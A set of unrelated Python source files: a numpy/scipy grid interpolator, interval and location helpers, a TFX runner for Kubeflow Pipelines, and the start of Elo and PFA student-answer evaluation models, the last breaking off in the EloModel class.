|
""" interpolate data given on an Nd rectangular grid, uniform or non-uniform.
Purpose: extend the fast N-dimensional interpolator
`scipy.ndimage.map_coordinates` to non-uniform grids, using `np.interp`.
Background: please look at
http://en.wikipedia.org/wiki/Bilinear_interpolation
http://stackoverflow.com/questions/6238250/multivariate-spline-interpolation-in-python-scipy
http://docs.scipy.org/doc/scipy-dev/reference/generated/scipy.ndimage.interpolation.map_coordinates.html
Example
-------
Say we have rainfall on a 4 x 5 grid of rectangles, lat 52 .. 55 x lon -10 .. -6,
and want to interpolate (estimate) rainfall at 1000 query points
in between the grid points.
# define the grid --
griddata = np.loadtxt(...) # griddata.shape == (4, 5)
lo = np.array([ 52, -10 ]) # lowest lat, lowest lon
hi = np.array([ 55, -6 ]) # highest lat, highest lon
# set up an interpolator function "interfunc()" with class Intergrid --
interfunc = Intergrid( griddata, lo=lo, hi=hi )
# generate 1000 random query points, lo <= [lat, lon] <= hi --
query_points = lo + np.random.uniform( size=(1000, 2) ) * (hi - lo)
# get rainfall at the 1000 query points --
query_values = interfunc( query_points ) # -> 1000 values
What this does:
for each [lat, lon] in query_points:
1) find the square of griddata it's in,
e.g. [52.5, -8.1] -> [0, 3] [0, 4] [1, 4] [1, 3]
2) do bilinear (multilinear) interpolation in that square,
using `scipy.ndimage.map_coordinates` .
Check:
interfunc( lo ) -> griddata[0, 0],
interfunc( hi ) -> griddata[-1, -1] i.e. griddata[3, 4]
Parameters
----------
griddata: numpy array_like, 2d 3d 4d ...
lo, hi: user coordinates of the corners of griddata, 1d array-like, lo < hi
maps: a list of `dim` descriptors of piecewise-linear or nonlinear maps,
e.g. [[50, 52, 62, 63], None] # uniformize lat, linear lon
copy: make a copy of query_points, default True;
copy=False overwrites query_points, runs in less memory
verbose: default 1: print a 1-line summary for each call, with run time
order=1: see `map_coordinates`
prefilter: 0 or False, the default: smoothing B-spline
1 or True: exact-fit interpolating spline (IIR, not C-R)
1/3: Mitchell-Netravali spline, 1/3 B + 2/3 fit
(prefilter is only for order > 1, since order = 1 interpolates)
Non-uniform rectangular grids
-----------------------------
What if our griddata above is at non-uniformly-spaced latitudes,
say [50, 52, 62, 63] ? `Intergrid` can "uniformize" these
before interpolation, like this:
lo = np.array([ 50, -10 ])
hi = np.array([ 63, -6 ])
maps = [[50, 52, 62, 63], None] # uniformize lat, linear lon
interfunc = Intergrid( griddata, lo=lo, hi=hi, maps=maps )
This will map (transform, stretch, warp) the lats in query_points column 0
to array coordinates in the range 0 .. 3, using `np.interp` to do
piecewise-linear (PWL) mapping:
50 51 52 53 54 55 56 57 58 59 60 61 62 63 # lo[0] .. hi[0]
0 .5 1 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2 3
`maps[1] None` says to map the lons in query_points column 1 linearly:
-10 -9 -8 -7 -6 # lo[1] .. hi[1]
0 1 2 3 4
More doc: https://denis-bz.github.com/docs/intergrid.html
"""
# split class Gridmap ?
from __future__ import division
from time import time
# warnings
import numpy as np
from scipy.ndimage import map_coordinates, spline_filter
__version__ = "2014-05-09 leif denby" # 9may: fix bug default argument bug
__author_email__ = "denis-bz-py@t-online.de" # comments welcome, testcases most welcome
#...............................................................................
class Intergrid:
    __doc__ = globals()["__doc__"]

    def __init__( self, griddata, lo, hi, maps=None, copy=True, verbose=1,
            order=1, prefilter=False ):
        griddata = np.asanyarray( griddata )
        dim = griddata.ndim  # - (griddata.shape[-1] == 1)  # ??
        assert dim >= 2, griddata.shape
        self.dim = dim
        # Scalar lo/hi broadcast to one value per grid axis.
        if np.isscalar(lo):
            lo *= np.ones(dim)
        if np.isscalar(hi):
            hi *= np.ones(dim)
        self.loclip = lo = np.asarray_chkfinite( lo ).copy()
        self.hiclip = hi = np.asarray_chkfinite( hi ).copy()
        assert lo.shape == (dim,), lo.shape
        assert hi.shape == (dim,), hi.shape
        self.copy = copy
        self.verbose = verbose
        self.order = order
        if order > 1 and 0 < prefilter < 1:  # 1/3: Mitchell-Netravali = 1/3 B + 2/3 fit
            exactfit = spline_filter( griddata )  # see Unser
            griddata += prefilter * (exactfit - griddata)
            prefilter = False
        self.griddata = griddata
        self.prefilter = (prefilter == True)
        if maps is None:
            maps = [None,] * len(lo)
        self.maps = maps
        self.nmap = 0
        if len(maps) > 0:
            assert len(maps) == dim, "maps must have len %d, not %d" % (
                dim, len(maps))
            # linear maps (map None): Xcol -= lo *= scale -> [0, n-1]
            # nonlinear: np.interp e.g. [50 52 62 63] -> [0 1 2 3]
            self._lo = np.zeros(dim)
            self._scale = np.ones(dim)
            # NOTE: the loop variable `map` shadows the builtin within this
            # scope (kept as-is; renaming is out of scope for a doc pass).
            for j, (map, n, l, h) in enumerate( zip( maps, griddata.shape, lo, hi )):
                ## print "test: j map n l h:", j, map, n, l, h
                if map is None or callable(map):
                    self._lo[j] = l
                    if h > l:
                        self._scale[j] = (n - 1) / (h - l)  # _map lo -> 0, hi -> n - 1
                    else:
                        self._scale[j] = 0  # h <= l: X[:,j] -> 0
                    continue
                # Explicit breakpoint array: a nonlinear PWL map on axis j.
                self.maps[j] = map = np.asanyarray(map)
                self.nmap += 1
                assert len(map) == n, "maps[%d] must have len %d, not %d" % (
                    j, n, len(map) )
                mlo, mhi = map.min(), map.max()
                if not (l <= mlo <= mhi <= h):
                    print ("Warning: Intergrid maps[%d] min %.3g max %.3g " \
                        "are outside lo %.3g hi %.3g" % (
                        j, mlo, mhi, l, h ))

    #...............................................................................
    def _map_to_uniform_grid( self, X ):
        """ clip, map X linear / nonlinear inplace """
        np.clip( X, self.loclip, self.hiclip, out=X )
        # X nonlinear maps inplace --
        for j, map in enumerate(self.maps):
            if map is None:
                continue
            if callable(map):
                X[:,j] = map( X[:,j] )  # clip again ?
            else:
                # PWL e.g. [50 52 62 63] -> [0 1 2 3] --
                X[:,j] = np.interp( X[:,j], map, np.arange(len(map)) )
        # linear map the rest, inplace (nonlinear _lo 0, _scale 1: noop)
        if self.nmap < self.dim:
            X -= self._lo
            X *= self._scale  # (griddata.shape - 1) / (hi - lo)
        ## print "test: _map_to_uniform_grid", X.T

    #...............................................................................
    def __call__( self, X, out=None ):
        """ query_values = Intergrid(...) ( query_points npt x dim )

        A 1d query of length `dim` is treated as a single point and the
        result is returned as a scalar rather than a length-1 array.
        """
        X = np.asanyarray(X)
        assert X.shape[-1] == self.dim, ("the query array must have %d columns, "
                "but its shape is %s" % (self.dim, X.shape) )
        Xdim = X.ndim
        if Xdim == 1:
            X = np.asarray([X])  # in a single point -> out scalar
        if self.copy:
            X = X.copy()
        assert X.ndim == 2, X.shape
        npt = X.shape[0]
        if out is None:
            out = np.empty( npt, dtype=self.griddata.dtype )
        t0 = time()
        self._map_to_uniform_grid( X )  # X inplace
        #...............................................................................
        map_coordinates( self.griddata, X.T,
                order=self.order, prefilter=self.prefilter,
                mode="nearest",  # outside -> edge
                # test: mode="constant", cval=np.NaN,
                output=out )
        if self.verbose:
            print ("Intergrid: %.3g msec %d points in a %s grid %d maps order %d" % (
                (time() - t0) * 1000, npt, self.griddata.shape, self.nmap, self.order ))
        return out if Xdim == 2 else out[0]

    # Alias: `interfunc.at(points)` reads better in some client code.
    at = __call__
# end intergrid.py
|
from typing import List, Tuple
"""
Module for Location & Interval manipulation
"""
def intervals_from_locations(locations: List[float]) -> List[float]:
    """Converts absolute locations into successive intervals.

    The first interval is measured from zero, i.e. it equals the first
    location; every other interval is the gap to the previous location.
    """
    if not locations:
        return []
    intervals = [locations[0]]
    for earlier, later in zip(locations, locations[1:]):
        intervals.append(later - earlier)
    return intervals
def locations_from_intervals(intervals: List[float]) -> List[float]:
    """Converts successive intervals into absolute locations (running sum).

    Inverse of intervals_from_locations.

    Fix: the previous implementation guarded the accumulation with
    `if index < len(intervals)`, which is always true inside the loop;
    the dead condition and the unused enumerate index are removed.
    """
    locations = []
    running_duration = 0
    for interval in intervals:
        running_duration += interval
        locations.append(running_duration)
    return locations
def start_end_locations_from_locations(locations: List[float]) -> Tuple[List[float], List[float]]:
    """
    Calculates the start and end times of each location
    Ex) 5, 10, 15
        start_times == 5, 10, 15
        end_times == 10, 15, 15
    Returns
    -------
    A tuple of start and end times
    """
    start_locations = list(locations)
    # Each location ends where the next one starts; the last one ends on
    # itself.  Slicing keeps the empty-input case trivially correct.
    end_locations = list(locations[1:]) + list(locations[-1:])
    return start_locations, end_locations
def start_end_locations_from_intervals(intervals: List[float]) -> Tuple[List[float], List[float]]:
    """
    Calculates the start and end times of each interval
    Ex) 5, 10, 15
        start_times == 0, 5, 10
        end_times == 5, 10, 15
    Returns
    -------
    A tuple of start and end times
    """
    start_locations = []
    end_locations = []
    elapsed = 0
    for duration in intervals:
        start_locations.append(elapsed)
        elapsed += duration
        end_locations.append(elapsed)
    return start_locations, end_locations
|
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX runner for Kubeflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Callable, Dict, List, Optional, Text, Type, cast
from absl import logging
from kfp import compiler
from kfp import dsl
from kfp import gcp
from kubernetes import client as k8s_client
from tfx import version
from tfx.dsl.compiler import compiler as tfx_compiler
from tfx.dsl.components.base import base_component as tfx_base_component
from tfx.orchestration import data_types
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration import tfx_runner
from tfx.orchestration.config import pipeline_config
from tfx.orchestration.kubeflow import base_component
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.orchestration.launcher import base_component_launcher
from tfx.orchestration.launcher import in_process_component_launcher
from tfx.orchestration.launcher import kubernetes_component_launcher
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import telemetry_utils
# OpFunc represents the type of a function that takes as input a
# dsl.ContainerOp and returns the same object. Common operations such as adding
# k8s secrets, mounting volumes, specifying the use of TPUs and so on can be
# specified as an OpFunc.
# See example usage here:
# https://github.com/kubeflow/pipelines/blob/master/sdk/python/kfp/gcp.py
OpFunc = Callable[[dsl.ContainerOp], dsl.ContainerOp]
# Default secret name for GCP credentials. This secret is installed as part of
# a typical Kubeflow installation when the component is GKE.
_KUBEFLOW_GCP_SECRET_NAME = 'user-gcp-sa'
# Default TFX container image to use in KubeflowDagRunner.
DEFAULT_KUBEFLOW_TFX_IMAGE = 'tensorflow/tfx:%s' % (version.__version__,)
def _mount_config_map_op(config_map_name: Text) -> OpFunc:
  """Mounts all key-value pairs found in the named Kubernetes ConfigMap.

  All key-value pairs in the ConfigMap are mounted as environment variables.

  Args:
    config_map_name: The name of the ConfigMap resource.

  Returns:
    An OpFunc for mounting the ConfigMap.
  """

  def mount_config_map(container_op: dsl.ContainerOp):
    # optional=True: the pod still starts if the ConfigMap is absent.
    env_source = k8s_client.V1EnvFromSource(
        config_map_ref=k8s_client.V1ConfigMapEnvSource(
            name=config_map_name, optional=True))
    container_op.container.add_env_from(env_source)

  return mount_config_map
def _mount_secret_op(secret_name: Text) -> OpFunc:
  """Mounts all key-value pairs found in the named Kubernetes Secret.

  All key-value pairs in the Secret are mounted as environment variables.

  Args:
    secret_name: The name of the Secret resource.

  Returns:
    An OpFunc for mounting the Secret.
  """

  def mount_secret(container_op: dsl.ContainerOp):
    # Fix: `V1EnvFromSource.secret_ref` must be a V1SecretEnvSource; the
    # previous code built a V1ConfigMapEnvSource, which the Kubernetes
    # client rejects / mis-serializes for a Secret reference.
    secret_ref = k8s_client.V1SecretEnvSource(
        name=secret_name, optional=True)
    container_op.container.add_env_from(
        k8s_client.V1EnvFromSource(secret_ref=secret_ref))

  return mount_secret
def get_default_pipeline_operator_funcs(
    use_gcp_sa: bool = False) -> List[OpFunc]:
  """Returns a default list of pipeline operator functions.

  Args:
    use_gcp_sa: If true, mount a GCP service account secret to each pod, with
      the name _KUBEFLOW_GCP_SECRET_NAME.

  Returns:
    A list of functions with type OpFunc.
  """
  # Enables authentication for GCP services if needed.
  gcp_secret_op = gcp.use_gcp_secret(_KUBEFLOW_GCP_SECRET_NAME)
  # Mounts configmap containing Metadata gRPC server configuration.
  mount_config_map_op = _mount_config_map_op('metadata-grpc-configmap')
  ops = [mount_config_map_op]
  if use_gcp_sa:
    ops = [gcp_secret_op] + ops
  return ops
def get_default_kubeflow_metadata_config(
) -> kubeflow_pb2.KubeflowMetadataConfig:
  """Returns the default metadata connection config for Kubeflow.

  Returns:
    A config proto that will be serialized as JSON and passed to the running
    container so the TFX component driver is able to communicate with MLMD in
    a Kubeflow cluster.
  """
  # The default metadata configuration for a Kubeflow Pipelines cluster is
  # codified as a Kubernetes ConfigMap
  # https://github.com/kubeflow/pipelines/blob/master/manifests/kustomize/base/metadata/metadata-grpc-configmap.yaml
  config = kubeflow_pb2.KubeflowMetadataConfig()
  # The environment variable to use to obtain the Metadata gRPC service host in
  # the cluster that is backing Kubeflow Metadata. Note that the key in the
  # config map and therefore environment variable used, are lower-cased.
  config.grpc_config.grpc_service_host.environment_variable = 'METADATA_GRPC_SERVICE_HOST'
  # The environment variable to use to obtain the Metadata grpc service port in
  # the cluster that is backing Kubeflow Metadata.
  config.grpc_config.grpc_service_port.environment_variable = 'METADATA_GRPC_SERVICE_PORT'
  # These env vars reach the component pods via the 'metadata-grpc-configmap'
  # mounted by get_default_pipeline_operator_funcs.
  return config
def get_default_pod_labels() -> Dict[Text, Text]:
  """Returns the default pod label dict for Kubeflow."""
  # KFP default transformers add pod env:
  # https://github.com/kubeflow/pipelines/blob/0.1.32/sdk/python/kfp/compiler/_default_transformers.py
  return {
      'add-pod-env': 'true',
      telemetry_utils.LABEL_KFP_SDK_ENV: 'tfx',
  }
def get_default_output_filename(pipeline_name: str) -> str:
  """Returns the default '<pipeline_name>.tar.gz' package file name."""
  return '{}.tar.gz'.format(pipeline_name)
class KubeflowDagRunnerConfig(pipeline_config.PipelineConfig):
  """Runtime configuration parameters specific to execution on Kubeflow."""

  def __init__(
      self,
      pipeline_operator_funcs: Optional[List[OpFunc]] = None,
      tfx_image: Optional[Text] = None,
      kubeflow_metadata_config: Optional[
          kubeflow_pb2.KubeflowMetadataConfig] = None,
      # TODO(b/143883035): Figure out the best practice to put the
      # SUPPORTED_LAUNCHER_CLASSES
      supported_launcher_classes: Optional[List[Type[
          base_component_launcher.BaseComponentLauncher]]] = None,
      **kwargs):
    """Creates a KubeflowDagRunnerConfig object.

    The user can use pipeline_operator_funcs to apply modifications to
    ContainerOps used in the pipeline. For example, to ensure the pipeline
    steps mount a GCP secret, and a Persistent Volume, one can create config
    object like so:

      from kfp import gcp, onprem
      mount_secret_op = gcp.use_secret('my-secret-name')
      mount_volume_op = onprem.mount_pvc(
          "my-persistent-volume-claim",
          "my-volume-name",
          "/mnt/volume-mount-path")

      config = KubeflowDagRunnerConfig(
          pipeline_operator_funcs=[mount_secret_op, mount_volume_op]
      )

    Args:
      pipeline_operator_funcs: A list of ContainerOp modifying functions that
        will be applied to every container step in the pipeline. Defaults to
        get_default_pipeline_operator_funcs().
      tfx_image: The TFX container image to use in the pipeline. Defaults to
        DEFAULT_KUBEFLOW_TFX_IMAGE.
      kubeflow_metadata_config: Runtime configuration to use to connect to
        Kubeflow metadata. Defaults to get_default_kubeflow_metadata_config().
      supported_launcher_classes: A list of component launcher classes that are
        supported by the current pipeline. List sequence determines the order in
        which launchers are chosen for each component being run.
      **kwargs: keyword args for PipelineConfig.
    """
    supported_launcher_classes = supported_launcher_classes or [
        in_process_component_launcher.InProcessComponentLauncher,
        kubernetes_component_launcher.KubernetesComponentLauncher,
    ]
    super(KubeflowDagRunnerConfig, self).__init__(
        supported_launcher_classes=supported_launcher_classes, **kwargs)
    self.pipeline_operator_funcs = (
        pipeline_operator_funcs or get_default_pipeline_operator_funcs())
    self.tfx_image = tfx_image or DEFAULT_KUBEFLOW_TFX_IMAGE
    self.kubeflow_metadata_config = (
        kubeflow_metadata_config or get_default_kubeflow_metadata_config())
class KubeflowDagRunner(tfx_runner.TfxRunner):
  """Kubeflow Pipelines runner.

  Constructs a pipeline definition YAML file based on the TFX logical pipeline.
  """

  def __init__(
      self,
      output_dir: Optional[Text] = None,
      output_filename: Optional[Text] = None,
      config: Optional[KubeflowDagRunnerConfig] = None,
      pod_labels_to_attach: Optional[Dict[Text, Text]] = None
  ):
    """Initializes KubeflowDagRunner for compiling a Kubeflow Pipeline.

    Args:
      output_dir: An optional output directory into which to output the pipeline
        definition files. Defaults to the current working directory.
      output_filename: An optional output file name for the pipeline definition
        file. Defaults to pipeline_name.tar.gz when compiling a TFX pipeline.
        Currently supports .tar.gz, .tgz, .zip, .yaml, .yml formats. See
        https://github.com/kubeflow/pipelines/blob/181de66cf9fa87bcd0fe9291926790c400140783/sdk/python/kfp/compiler/compiler.py#L851
        for format restriction.
      config: An optional KubeflowDagRunnerConfig object to specify runtime
        configuration when running the pipeline under Kubeflow.
      pod_labels_to_attach: Optional set of pod labels to attach to GKE pod
        spinned up for this pipeline. Default to the 3 labels:
        1. add-pod-env: true,
        2. pipeline SDK type,
        3. pipeline unique ID,
        where 2 and 3 are instrumentation of usage tracking.
    """
    if config and not isinstance(config, KubeflowDagRunnerConfig):
      raise TypeError('config must be type of KubeflowDagRunnerConfig.')
    super(KubeflowDagRunner, self).__init__(config or KubeflowDagRunnerConfig())
    self._config = cast(KubeflowDagRunnerConfig, self._config)
    self._output_dir = output_dir or os.getcwd()
    self._output_filename = output_filename
    self._compiler = compiler.Compiler()
    self._tfx_compiler = tfx_compiler.Compiler()
    self._params = []  # List of dsl.PipelineParam used in this pipeline.
    self._deduped_parameter_names = set()  # Set of unique param names used.
    if pod_labels_to_attach is None:
      self._pod_labels_to_attach = get_default_pod_labels()
    else:
      self._pod_labels_to_attach = pod_labels_to_attach

  def _parse_parameter_from_component(
      self, component: tfx_base_component.BaseComponent) -> None:
    """Extract embedded RuntimeParameter placeholders from a component.

    Extract embedded RuntimeParameter placeholders from a component, then append
    the corresponding dsl.PipelineParam to KubeflowDagRunner.

    Args:
      component: a TFX component.
    """
    for parameter in component.exec_properties.values():
      if not isinstance(parameter, data_types.RuntimeParameter):
        continue
      # Ignore pipeline root because it will be added later.
      if parameter.name == tfx_pipeline.ROOT_PARAMETER.name:
        continue
      # Each RuntimeParameter name becomes at most one dsl.PipelineParam.
      if parameter.name not in self._deduped_parameter_names:
        self._deduped_parameter_names.add(parameter.name)
        # TODO(b/178436919): Create a test to cover default value rendering
        # and move the external code reference over there.
        # The default needs to be serialized then passed to dsl.PipelineParam.
        # See
        # https://github.com/kubeflow/pipelines/blob/f65391309650fdc967586529e79af178241b4c2c/sdk/python/kfp/dsl/_pipeline_param.py#L154
        dsl_parameter = dsl.PipelineParam(
            name=parameter.name,
            # TODO(b/186566348): remove the quote replacement.
            value=str(parameter.default).replace('\\',
                                                 '\\\\').replace('"', '\\"'))
        self._params.append(dsl_parameter)

  def _parse_parameter_from_pipeline(self,
                                     pipeline: tfx_pipeline.Pipeline) -> None:
    """Extract all the RuntimeParameter placeholders from the pipeline."""
    for component in pipeline.components:
      self._parse_parameter_from_component(component)

  def _construct_pipeline_graph(self, pipeline: tfx_pipeline.Pipeline,
                                pipeline_root: dsl.PipelineParam):
    """Constructs a Kubeflow Pipeline graph.

    Args:
      pipeline: The logical TFX pipeline to base the construction on.
      pipeline_root: dsl.PipelineParam representing the pipeline root.
    """
    component_to_kfp_op = {}
    tfx_ir = self._generate_tfx_ir(pipeline)
    # Assumption: There is a partial ordering of components in the list, i.e.,
    # if component A depends on component B and C, then A appears after B and C
    # in the list.
    for component in pipeline.components:
      # Keep track of the set of upstream dsl.ContainerOps for this component.
      depends_on = set()
      for upstream_component in component.upstream_nodes:
        # Safe under the partial-ordering assumption above: upstream ops have
        # already been inserted into component_to_kfp_op.
        depends_on.add(component_to_kfp_op[upstream_component])
      kfp_component = base_component.BaseComponent(
          component=component,
          depends_on=depends_on,
          pipeline=pipeline,
          pipeline_root=pipeline_root,
          tfx_image=self._config.tfx_image,
          kubeflow_metadata_config=self._config.kubeflow_metadata_config,
          pod_labels_to_attach=self._pod_labels_to_attach,
          tfx_ir=tfx_ir)
      # Apply the user-supplied ContainerOp modifiers (secrets, volumes, ...).
      for operator in self._config.pipeline_operator_funcs:
        kfp_component.container_op.apply(operator)
      component_to_kfp_op[component] = kfp_component.container_op

  def _generate_tfx_ir(
      self, pipeline: tfx_pipeline.Pipeline) -> Optional[pipeline_pb2.Pipeline]:
    """Compiles the logical pipeline into its TFX IR proto representation."""
    result = self._tfx_compiler.compile(pipeline)
    logging.info('Generated pipeline:\n %s', result)
    return result

  def run(self, pipeline: tfx_pipeline.Pipeline):
    """Compiles and outputs a Kubeflow Pipeline YAML definition file.

    Args:
      pipeline: The logical TFX pipeline to use when building the Kubeflow
        pipeline.
    """
    for component in pipeline.components:
      # TODO(b/187122662): Pass through pip dependencies as a first-class
      # component flag.
      if isinstance(component, tfx_base_component.BaseComponent):
        component._resolve_pip_dependencies(  # pylint: disable=protected-access
            pipeline.pipeline_info.pipeline_root)
    # KFP DSL representation of pipeline root parameter.
    dsl_pipeline_root = dsl.PipelineParam(
        name=tfx_pipeline.ROOT_PARAMETER.name,
        value=pipeline.pipeline_info.pipeline_root)
    self._params.append(dsl_pipeline_root)

    def _construct_pipeline():
      """Constructs a Kubeflow pipeline.

      Creates Kubeflow ContainerOps for each TFX component encountered in the
      logical pipeline definition.
      """
      self._construct_pipeline_graph(pipeline, dsl_pipeline_root)

    # Need to run this first to get self._params populated. Then KFP compiler
    # can correctly match default value with PipelineParam.
    self._parse_parameter_from_pipeline(pipeline)
    file_name = self._output_filename or get_default_output_filename(
        pipeline.pipeline_info.pipeline_name)
    # Create workflow spec and write out to package.
    # NOTE(review): this relies on a private KFP compiler API; confirm it
    # still exists when the kfp dependency is upgraded.
    self._compiler._create_and_write_workflow(  # pylint: disable=protected-access
        pipeline_func=_construct_pipeline,
        pipeline_name=pipeline.pipeline_info.pipeline_name,
        params_list=self._params,
        package_path=os.path.join(self._output_dir, file_name))
|
# -*- coding: utf-8 -*-
"""
Evaluation Models
=================
"""
from __future__ import division
from copy import copy
from itertools import izip
from collections import defaultdict
import numpy as np
import pandas as pd
import tools
__all__ = (
'DummyPriorModel',
'EloModel',
'EloResponseTime',
'PFAModel',
'PFAResponseTime',
'PFAExt',
'PFAExtTiming',
'PFAExtStaircase',
'PFAExtSpacing',
'PFAGong',
'PFAGongTiming',
'PFATiming',
)
#: Dictionary of the most commonly used time effect functions in this thesis.
time_effect_funcs = {}


def register_time_effect(name):
    """Returns a decorator that registers a time effect function
    under *name* in :data:`time_effect_funcs`.
    """
    def register(time_effect):
        time_effect_funcs[name] = time_effect
        # Fix: return the function so the decorated module-level name is
        # the function itself instead of None.
        return time_effect
    return register


@register_time_effect('log')
def time_effect_log(t, a=1.8, c=0.123):
    return a - c * np.log(t)


@register_time_effect('pow')
def time_effect_div(t, a=2, c=0.2):
    return a / (t+1) ** c


@register_time_effect('exp')
def time_effect_exp(t, a=1.6, c=0.01):
    return a * np.exp(-c * np.sqrt(t))


def init_time_effect(obj, name, parameters=('a', 'c')):
    """Prepares time effect function based on name. Initializes
    the given object with default parameters `a` and `c`.

    :param obj: Object to initialize with time effect function.
    :param name: Name of the time effect function.
    :param parameters: Names of the two attributes on *obj* holding the
        function's parameters.
    """
    time_effect_fun = time_effect_funcs[name]
    # Fix: `func_defaults` exists only in Python 2; `__defaults__` is the
    # portable spelling (Python 2.6+ and Python 3).
    defaults = time_effect_fun.__defaults__

    a, c = parameters

    # Fill in defaults only for parameters the object does not define yet.
    if getattr(obj, a, None) is None:
        setattr(obj, a, defaults[0])
    if getattr(obj, c, None) is None:
        setattr(obj, c, defaults[1])

    def time_effect(t):
        # Read the (possibly re-fitted) parameters at call time.
        a_val, c_val = getattr(obj, a), getattr(obj, c)
        return time_effect_fun(t, a_val, c_val)

    return time_effect
class Question(object):
    """Representation of a question."""

    def __init__(self, **kwargs):
        # Consume the required fields from the keyword arguments; a missing
        # field raises KeyError, exactly as explicit pops would.
        for name in ('id', 'user_id', 'place_id', 'type',
                     'inserted', 'options'):
            setattr(self, name, kwargs.pop(name))
class Answer(Question):
    """Answer to a question."""

    def __init__(self, **kwargs):
        # Let Question consume its fields first, then take the answer-only
        # fields out of what remains.
        super(Answer, self).__init__(**kwargs)
        for name in ('place_answered', 'response_time', 'is_correct'):
            setattr(self, name, kwargs.pop(name))
class User(object):
    """Representation of a user with given ID.

    :param user_id: ID of the user.
    :type user_id: int
    """

    def __init__(self, user_id):
        self.id = user_id
        self.skill_increments = []

    @property
    def skill(self):
        """Current skill of the user (the sum of all increments)."""
        return sum(self.skill_increments)

    @property
    def answers_count(self):
        """Number of answers of the user; equals the number of skill
        increments.
        """
        return len(self.skill_increments)

    def inc_skill(self, increment):
        """Increments the skill of the user.

        :param increment: Increment (or decrement) of the skill.
        :type increment: float
        """
        self.skill_increments.append(increment)
class Place(object):
    """Representation of a place with given ID.

    :param place_id: ID of the place.
    :type place_id: int
    """

    def __init__(self, place_id):
        self.id = place_id
        self.difficulty_increments = []

    @property
    def difficulty(self):
        """Current difficulty of the place (the sum of all increments)."""
        return sum(self.difficulty_increments)

    @property
    def answers_count(self):
        """Number of answers for the place; equals the number of
        difficulty increments.
        """
        return len(self.difficulty_increments)

    def inc_difficulty(self, increment):
        """Increments the difficulty of the place.

        :param increment: Increment (or decrement) of the difficulty.
        :type increment: float
        """
        self.difficulty_increments.append(increment)
class Item(object):
    """Item representation.

    :param prior: Prior skills of users and difficulties of places.
    :type prior: dictionary
    :param user_id: ID of the user.
    :type user_id: int
    :param place_id: ID of the place.
    :type place_id: int
    """

    def __init__(self, prior, user_id, place_id):
        self.prior = prior
        self.user_id = user_id
        self.place_id = place_id
        self.practices = []  # chronological list of Answer objects
        self.knowledge_increments = []

    @property
    def user(self):
        """User answering the item."""
        return self.prior.users[self.user_id]

    @property
    def place(self):
        """Place of the item being asked."""
        return self.prior.places[self.place_id]

    @property
    def knowledge(self):
        """Knowledge of the item by the user: the prior (skill minus
        difficulty) plus all accumulated increments.
        """
        return (
            (self.user.skill - self.place.difficulty)
            + sum(self.knowledge_increments)
        )

    @property
    def correct(self):
        """List of correct answers."""
        return [ans for ans in self.practices if ans.is_correct]

    @property
    def incorrect(self):
        """List of incorrect answers."""
        return [ans for ans in self.practices if not ans.is_correct]

    @property
    def last_inserted(self):
        """Returns the time of the last answer for this item
        or :obj:`None` if the item was never answered before.
        """
        if self.practices:
            return self.practices[-1].inserted

    @property
    def any_incorrect(self):
        """:obj:`True` if at least one of the practiced item
        was answered incorrectly, otherwise :obj:`False`.
        """
        return any(not answer.is_correct for answer in self.practices)

    def get_diffs(self, current):
        """Returns list of previous practices expressed as the number
        of seconds that passed between *current* practice and all
        the *previous* practices.

        :param current: Datetime of the current practice.
        :type current: datetime.datetime
        """
        return [
            tools.time_diff(current, prior.inserted)
            for prior in self.practices
        ]

    def inc_knowledge(self, increment):
        """Increments the knowledge of the user of the item.

        :param increment: Increment (or decrement) of the knowledge.
        :type increment: float
        """
        self.knowledge_increments += [increment]

    def add_practice(self, answer):
        """Registers new practice of the item.

        :param answer: Information about the answer.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        # Normalize pandas rows to Answer objects; copy plain answers so the
        # stored practice is decoupled from the caller's object.
        if isinstance(answer, pd.Series):
            self.practices += [Answer(**answer.to_dict())]
        else:
            self.practices += [copy(answer)]
class Model(object):
    """Abstract base class of all evaluation models."""

    ABBR = None

    def respect_guess(self, prediction, options):
        """Adjusts a prediction for the chance of a lucky guess.

        :param prediction: Prediction calculated so far.
        :type prediction: float
        :param options: Options of the multiple-choice question
            (falsy for open-ended questions).
        :type options: list
        """
        if not options:
            return prediction
        guess = 1 / len(options)
        return guess + (1 - guess) * prediction

    def predict(self, question):
        """Returns probability of correct answer for given question.

        :param question: Asked question.
        :type question: :class:`pandas.Series` or :class:`Question`
        """
        raise NotImplementedError()

    def update(self, answer):
        """Performs an update of skills, difficulties or knowledge.

        :param answer: Asked question.
        :type answer: :class:`pandas.Series` or :class:`Answer`
        """
        raise NotImplementedError()

    def train(self, data):
        """Trains the model on given data set.

        :param data: Data set on which to train the model.
        :type data: :class:`pandas.DataFrame`
        """
        raise NotImplementedError()

    @classmethod
    def split_data(cls, data, ratio=0.7):
        """Classmethod that splits data into training set and test set.

        :param data: The object containing data.
        :type data: :class:`pandas.DataFrame`.
        :param ratio: What portion of data to include in the training set
            and the test set. :obj:`0.5` means that the data will be
            distributed equally.
        :type ratio: float
        """
        raise NotImplementedError()
class DummyPriorModel(Model):
    """Dummy model that sets all skills of users and difficulties
    of places to zero.
    """

    class _User(object):
        """Stub user with a fixed skill."""
        def __init__(self, skill):
            self.skill = skill

    class _Place(object):
        """Stub place with a fixed difficulty."""
        def __init__(self, difficulty):
            self.difficulty = difficulty

    def __init__(self, skill=0.0, difficulty=0.0):
        # Any user/place that gets looked up materializes with the same
        # constant skill/difficulty.
        make_user = lambda: self._User(skill)
        make_place = lambda: self._Place(difficulty)
        self.users = defaultdict(make_user)
        self.places = defaultdict(make_place)

    def update(self, answer):
        """No-op: the dummy prior never learns."""
        pass

    def train(self, data):
        """No-op: the dummy prior never learns."""
        pass
class EloModel(Model):
    """Predicts correctness of answers using Elo Rating System.
    The model is parametrized with `alpha` and `beta`. These parameters
    affect the uncertainty function.
    """

    ABBR = 'Elo'

